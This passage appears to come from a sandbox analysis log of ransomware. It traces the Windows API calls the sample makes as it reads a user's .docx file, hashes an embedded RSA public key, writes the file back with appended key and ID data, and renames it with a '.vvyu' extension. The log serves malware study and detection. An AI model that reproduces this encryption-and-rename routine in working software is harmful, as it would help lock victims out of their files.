dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.075] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1a01, lpOverlapped=0x0) returned 1 [0189.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.076] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.077] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.077] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.077] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.077] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.077] GetLastError () returned 0x0 [0189.078] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.078] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.078] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.078] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.078] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a00) returned 0x2af1f88 [0189.079] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a40 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a88 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.080] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3990 [0189.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3990 | out: hHeap=0x2c0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da78 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.083] GetCurrentThreadId () returned 0x5d8 [0189.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4068 [0189.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.084] GetCurrentThreadId () returned 0x5d8 [0189.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0189.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3990 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3ba0 [0189.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3db8 [0189.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3ba0 | out: hHeap=0x2c0000) returned 1 [0189.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3db8 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2a88 | out: hHeap=0x2c0000) returned 1 [0189.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3990 | out: hHeap=0x2c0000) returned 1 [0189.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.097] WriteFile (in: hFile=0x584, lpBuffer=0x2af1f88*, nNumberOfBytesToWrite=0x19fc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af1f88*, lpNumberOfBytesWritten=0x2f9fb14*=0x19fc, lpOverlapped=0x0) returned 1 [0189.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.097] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1a01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.097] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.099] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.099] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.099] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.099] CloseHandle (hObject=0x584) returned 1 [0189.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.101] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Dr8UIj1jmG.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dr8uij1jmg.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Dr8UIj1jmG.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\dr8uij1jmg.docx.vvyu")) returned 1 [0189.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.102] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: 